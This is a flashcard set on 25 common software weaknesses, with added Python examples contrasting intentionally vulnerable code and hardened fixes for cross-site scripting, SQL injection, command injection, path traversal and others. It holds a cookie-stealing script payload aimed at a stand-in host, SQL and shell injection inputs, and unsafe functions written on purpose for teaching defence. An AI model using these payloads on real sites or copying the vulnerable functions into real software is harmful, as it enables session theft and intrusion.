25 Cards in this Set

  • Front
  • Back
Failure to Preserve Web Page Structure ('Cross-site Scripting')
Attackers can inject JavaScript or other browser-executable content into a web page that your application generates.
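The card above names the problem; the following is an added example (not taken from the flashcard set or from CWE) showing the unsafe concatenation, the hardened output encoding for two HTML contexts, and a small checker that lists the elements a browser would actually create from the rendered markup. The comment string is constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: a comment an attacker submits through the form.
HOSTILE_COMMENT = '<script>location="https://evil.example/?c="+document.cookie</script>'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the untrusted string is pasted straight into the page."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """Hardened: encode for the HTML text context before concatenation."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def render_attribute_unsafe(value: str) -> str:
    """Vulnerable: a value containing a double quote closes the attribute
    and whatever follows becomes a new attribute, e.g. an event handler."""
    return f'<input type="text" value="{value}">'


def render_attribute_safe(value: str) -> str:
    """Hardened attribute context: quote the attribute AND escape quotes in it."""
    return f'<input type="text" value="{html.escape(value, quote=True)}">'


class _ElementCollector(HTMLParser):
    """Records each start tag with its attribute names, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.elements: list = []

    def handle_starttag(self, tag, attrs):
        self.elements.append((tag, [name for name, _ in attrs]))


def elements(markup: str) -> list:
    """Return [(tag, [attribute names]), ...] for the markup, so a test can
    see whether untrusted input added elements or attributes."""
    parser = _ElementCollector()
    parser.feed(markup)
    return parser.elements
```

`html.escape` covers the text and quoted-attribute contexts only; a value placed inside a `<script>` block, a URL, or CSS needs the encoder for that context, which is why templating engines escape per context rather than with one function.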
Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection')
Attackers can influence the SQL that you use to communicate with your database and then suddenly all your fun and profit belongs to them.
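As an added example (not part of the flashcard set or CWE's text), the difference between splicing input into the SQL string and binding it as a parameter, run against a constructed in-memory SQLite table. The `list_sorted_safe` helper shows the one case parameters cannot cover: identifiers such as column names, which must be checked against an allowlist instead.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a real user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "token-a"), ("bob", "token-b")])
    return conn


DB = make_db()


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the input is part of the SQL text, so a quote in the
    input ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT name, secret FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the statement is fixed; the value is bound as a parameter
    and can only ever be compared with the column, never parsed."""
    return conn.execute(
        "SELECT name, secret FROM users WHERE name = ?", (name,)
    ).fetchall()


SORTABLE_COLUMNS = {"name"}   # allowlist of identifiers the client may pick


def list_sorted_safe(conn: sqlite3.Connection, column: str) -> list:
    """Identifiers cannot be bound parameters, so validate them strictly
    before they are ever placed in the statement text."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    return conn.execute(f"SELECT name FROM users ORDER BY {column}").fetchall()
```

`' OR '1'='1` turns the unsafe lookup into a query that matches every row, and the UNION variant returns the whole table regardless of the name searched for; the parameterised version returns nothing for both because no user is literally called that.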
Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Copying an untrusted input without checking the size of that input is the simplest error to make.
Cross-Site Request Forgery (CSRF)
The attacker tricks a logged-in user's browser into sending a request to your site, and your site acts on it as if the user had meant to send it.
Improper Access Control (Authorization)
If you don't ensure that your software's users are only doing what they're allowed to, then attackers will try to exploit your improper authorization and exercise unauthorized functionality that you only intended for restricted users.
Reliance on Untrusted Inputs in a Security Decision
Software developers often rely on inputs that the client controls, such as cookies, hidden form fields or request parameters, and when these inputs are used to decide whether to grant access to restricted resources, trouble is just around the corner.
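Added example, not from the flashcard set or from CWE, serving both the CSRF card and the untrusted-input card above: the same HMAC helper lets the server recognise values it issued itself. A role stored in a plain cookie is whatever the client says it is; a signed value is only honoured if the MAC checks out. The same helper binds a CSRF token to a session, so a token the attacker obtained from their own session is useless against the victim's. `SERVER_KEY` is generated per process here purely so the example runs offline; a deployment would load it from a secret store.

```python
import hashlib
import hmac
import secrets

# Assumed server-side key (generated per process so the example is self-contained).
SERVER_KEY = secrets.token_bytes(32)


def sign(value: str, key: bytes = SERVER_KEY) -> str:
    """Attach an HMAC-SHA256 tag to a value the client will hand back later."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify(token: str, key: bytes = SERVER_KEY):
    """Return the signed value, or None if the tag is missing or wrong."""
    value, sep, mac = token.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


# --- Reliance on untrusted inputs in a security decision -------------------

def role_from_cookie_unsafe(cookie: str) -> str:
    """Vulnerable: the client wrote this cookie, so the client picks the role."""
    return cookie.split("=", 1)[1]


def role_from_cookie_safe(cookie: str) -> str:
    """Hardened: only a role the server signed earlier is honoured;
    anything else is treated as an anonymous visitor."""
    value = verify(cookie.split("=", 1)[1])
    return value or "anonymous"


# --- Cross-Site Request Forgery ---------------------------------------------

def issue_csrf_token(session_id: str) -> str:
    """Token tied to one session; the page embeds it in state-changing forms."""
    return sign(f"csrf:{session_id}")


def check_csrf(session_id: str, submitted_token: str) -> bool:
    """A cross-site page cannot read the victim's form to copy the token,
    and a token minted for another session does not verify for this one."""
    return verify(submitted_token) == f"csrf:{session_id}"
```

Signing a role in a cookie stops tampering but not replay of an old cookie; keeping the role server-side, keyed by an opaque session id, avoids both, and the CSRF token is the piece that still has to travel to the client.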
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
An attacker could combine multiple ".." or similar sequences to cause the operating system to navigate out of the restricted directory, and into the rest of the system.
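An added example (not from the flashcard set or CWE) of the check that keeps a client-supplied name under the restricted directory: decode once, normalise, then require the result to be `BASE` itself or something strictly below `BASE/`. `BASE` is an assumed directory; the pure-path `posixpath` functions are used so the check runs without touching a filesystem.

```python
import posixpath
from urllib.parse import unquote

BASE = "/srv/app/files"   # assumed restricted directory


def resolve_unsafe(name: str) -> str:
    """Vulnerable: whatever the client sent is joined under BASE and used."""
    return posixpath.join(BASE, name)


def resolve_safe(name: str) -> str:
    """Hardened: decode, normalise, then prove the result stays under BASE."""
    decoded = unquote(name)                     # undo %2e%2e%2f-style encoding once
    if "\x00" in decoded or "%" in decoded:     # NUL, or a second encoding layer
        raise ValueError("encoded or NUL bytes are not allowed")
    candidate = posixpath.normpath(posixpath.join(BASE, decoded))
    # startswith(BASE) alone would accept /srv/app/files-old; require the slash.
    if candidate != BASE and not candidate.startswith(BASE + "/"):
        raise ValueError("path escapes the restricted directory")
    return candidate


def stays_inside(name: str) -> bool:
    """Convenience predicate around resolve_safe for callers and tests."""
    try:
        resolve_safe(name)
        return True
    except ValueError:
        return False
```

`normpath` does not follow symbolic links, so on a real filesystem resolve the candidate with `os.path.realpath` and repeat the prefix check on the result; a link inside `BASE` pointing outside it would otherwise pass.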
Unrestricted Upload of File with Dangerous Type
The name of the uploaded file could contain a dangerous extension such as .php instead of .gif, or other information (such as the client-supplied content type) may cause your server to treat the image like a big honkin' program.
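Added example, not from the flashcard set or CWE, of an upload filter that checks the extension against an allowlist, checks that the bytes really start like that file type, ignores the client's content type entirely, and never reuses the client's filename on disk. The allowlist and magic bytes are the example's own assumptions.

```python
import secrets

# Allowed extensions mapped to the leading bytes the content must have.
ALLOWED_TYPES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
}


def check_upload(filename: str, content_type: str, data: bytes):
    """Return (stored_name, reason); stored_name is None when rejected.

    content_type is taken as a parameter only to make the point that it is
    ignored: the client sets it, so it proves nothing about the bytes."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_TYPES:
        return None, "extension not allowed"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return None, "content does not match extension"
    # Server-chosen name: random, only the validated extension, no directory
    # components, so "../../x.gif" or "shell.php.gif" never reach the disk as sent.
    return f"{secrets.token_hex(16)}.{ext}", "ok"
```

A file that starts with a valid GIF header and then contains PHP passes this filter, so the check is a front door, not the wall: store uploads outside the web root or on a host that never executes them, and ideally re-encode images through an image library before serving them.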
Improper Sanitization of Special Elements used in an OS Command ('OS Command Injection')
When you invoke another program on the operating system, but you allow untrusted inputs to be fed into the command string that you generate for executing that program, then you are inviting attackers to cross that bridge into a land of riches by executing their own commands instead of yours.
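As an added example (not from the flashcard set or CWE), the two ways of invoking an external program side by side. The "external tool" is a one-line Python script that prints its arguments, so the example needs nothing beyond the interpreter; the vulnerable path assumes a POSIX `/bin/sh` behind `shell=True`. The hostname validator is the example's own defence-in-depth rule.

```python
import re
import shlex
import subprocess
import sys

# Stand-in for an external tool: a script that prints the arguments it received.
ECHO_ARGS = "import sys; print(sys.argv[1:])"


def run_unsafe(host: str) -> str:
    """Vulnerable: the program path is quoted, the user input is not, and
    the whole string is handed to the shell (assumed POSIX sh)."""
    cmd = f'{shlex.quote(sys.executable)} -c "{ECHO_ARGS}" {host}'
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_safe(host: str) -> str:
    """Hardened: an argv list and no shell, so the input arrives at the
    tool as exactly one argument, metacharacters included."""
    argv = [sys.executable, "-c", ECHO_ARGS, host]
    return subprocess.run(argv, capture_output=True, text=True).stdout


# Assumed policy: a hostname is letters, digits, dots and hyphens, and does
# not start with a hyphen (which some tools would read as an option).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def validate_hostname(host: str) -> str:
    """Refuse anything that cannot be a hostname, even without a shell in play."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"not a hostname: {host!r}")
    return host


def is_hostname(host: str) -> bool:
    try:
        validate_hostname(host)
        return True
    except ValueError:
        return False
```

With `example.com; echo PWNED` the shell version runs the tool with `example.com` and then runs a second command the developer never wrote; the argv version passes the entire string as one argument, and the validator rejects it before either happens.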
Missing Encryption of Sensitive Data
Whenever sensitive data is being stored or transmitted anywhere outside of your control, attackers may be looking for ways to get to it.
Use of Hard-coded Credentials
Hard-coding a secret password or cryptographic key into your program is bad manners, even though it makes it extremely convenient - for skilled reverse engineers.
Buffer Access with Incorrect Length Value
A common programming mistake is to access memory buffers using an incorrect length value, so that a read or write runs past the memory that was actually allocated.
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
You can make a lot of smaller parts of a document (or program), then combine them all together into one big document (or program) by "including" or "requiring" those smaller pieces; if an attacker controls the name of the piece being included, the attacker controls which code runs.
Improper Validation of Array Index
If you use untrusted inputs when calculating an index into an array, then an attacker could provide an index that is outside the boundaries of the array.
Improper Check for Unusual or Exceptional Conditions
If you always expect the worst, then you'll be better prepared for attackers who seek to inflict their worst.
Information Exposure Through an Error Message
The secrets could cover a wide range of valuable data, including personally identifiable information (PII), authentication credentials, and server configuration.
Integer Overflow or Wraparound
In the real world, 255+1=256. But to a computer program, sometimes 255+1=0, or 0-1=65535, or maybe 40,000+40,000=14464.
Incorrect Calculation of Buffer Size
Any number of problems could produce the incorrect calculation, but when all is said and done, you're going to run head-first into the dreaded buffer overflow.
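Added example, not from the flashcard set or CWE, serving both the integer-wraparound card and the incorrect-buffer-size card: fixed-width unsigned arithmetic is modelled by masking, which reproduces the card's 255+1=0 and 40,000+40,000=14464, and then shows the two places where the wrap matters in practice, a length check that an oversized attacker-supplied length slips past, and an allocation size that wraps to a few bytes. The 32-bit widths and field names are the example's assumptions.

```python
def wrap(value: int, bits: int) -> int:
    """Model fixed-width unsigned arithmetic: keep only the low `bits` bits."""
    return value & ((1 << bits) - 1)


U32_MAX = (1 << 32) - 1


def length_check_unsafe(header_len: int, payload_len: int, buf_size: int) -> bool:
    """Vulnerable: the sum is formed in 32-bit unsigned arithmetic (as a C
    program would), so a huge attacker-chosen payload_len wraps it small."""
    return wrap(header_len + payload_len, 32) <= buf_size


def length_check_fixed(header_len: int, payload_len: int, buf_size: int) -> bool:
    """Hardened: detect the overflow before trusting the sum."""
    if payload_len > U32_MAX - header_len:
        return False
    return header_len + payload_len <= buf_size


def multiply_overflows(count: int, elem_size: int, bits: int = 32) -> bool:
    """True when count * elem_size does not fit in `bits` unsigned bits."""
    return elem_size != 0 and count > ((1 << bits) - 1) // elem_size


def alloc_size_unsafe(count: int, elem_size: int) -> int:
    """Vulnerable: the wrapped product becomes the (far too small) allocation."""
    return wrap(count * elem_size, 32)


def alloc_size_fixed(count: int, elem_size: int) -> int:
    """Hardened: refuse the request instead of allocating a wrapped size."""
    if multiply_overflows(count, elem_size):
        raise OverflowError("allocation size does not fit in 32 bits")
    return count * elem_size
```

The unsafe length check accepts a 4 GiB payload into a 1 KiB buffer because 16 + 0xFFFFFFF8 wraps to 8; the unsafe allocator returns 4 bytes for 0x40000001 four-byte elements, and the copy that follows either would overflow exactly as the card describes.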
Missing Authentication for Critical Function
Software may expose certain critical functionality with the assumption that nobody would think of trying to do anything but break in through the front door. But attackers know how to case a joint and figure out alternate ways of getting into a system.
Download of Code Without Integrity Check
Attackers can hack the download site, impersonate it with DNS spoofing or cache poisoning, convince the system to redirect to a different site, or even modify the code in transit as it crosses the network. This scenario even applies to cases in which your own product downloads and installs its own updates.
Incorrect Permission Assignment for Critical Resource
It's rude to take something without asking permission first, but impolite users (i.e., attackers) are willing to spend a little time to see what they can get away with.
Allocation of Resources Without Limits or Throttling
The lack of control over resource allocation is an avenue for attackers to cause a denial of service against other users of your software, possibly the entire system - and in some cases, this can be leveraged to conduct other more devastating attacks.
URL Redirection to Untrusted Site ('Open Redirect')
Many web applications have implemented redirect features that allow attackers to specify an arbitrary URL to link to, and the web client does this automatically.
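An added example (not from the flashcard set or CWE) of validating a redirect target: site-relative paths are allowed, absolute URLs only to an assumed allowlist of hosts. The interesting part is the set of inputs that look relative to a naive check but that browsers send elsewhere, such as `//evil`, `///evil`, `/\evil` and `https:evil`, and the userinfo trick `https://app.example.com@evil`.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"app.example.com"}   # assumed: hosts we may redirect to


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only for a site-relative path or an http(s) URL on an allowed host."""
    if not target or target != target.strip():
        return False
    # Browsers fold backslashes and strip control characters before parsing,
    # so "/\evil" becomes "//evil"; reject them outright.
    if any(c in target for c in "\\\r\n\t\x00"):
        return False
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: exactly one leading slash. "//host" and "///host"
        # are scheme-relative (urlsplit reads "///host" as path "/host").
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False                    # javascript:, data:, ...
    if "@" in parts.netloc:
        return False                    # https://allowed@evil goes to evil
    # "https:evil" has no netloc, so hostname is None and is not allowed.
    return parts.hostname in allowed_hosts


def redirect_target(target: str, fallback: str = "/") -> str:
    """What the handler should actually send in the Location header."""
    return target if is_safe_redirect(target) else fallback
```

When the allowlist is only ever the application's own host, the simplest fix is to accept nothing but a relative path and build the absolute URL server-side; the host check is for the cases where a few known external hosts really do need to be targets.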
Use of a Broken or Risky Cryptographic Algorithm
You might think you created a brand-new algorithm that nobody will figure out, but it's more likely that you're reinventing a wheel that falls off just before the parade is about to start.
Race Condition
Attackers may consciously look to exploit them to cause chaos or to get your application to cough up something valuable.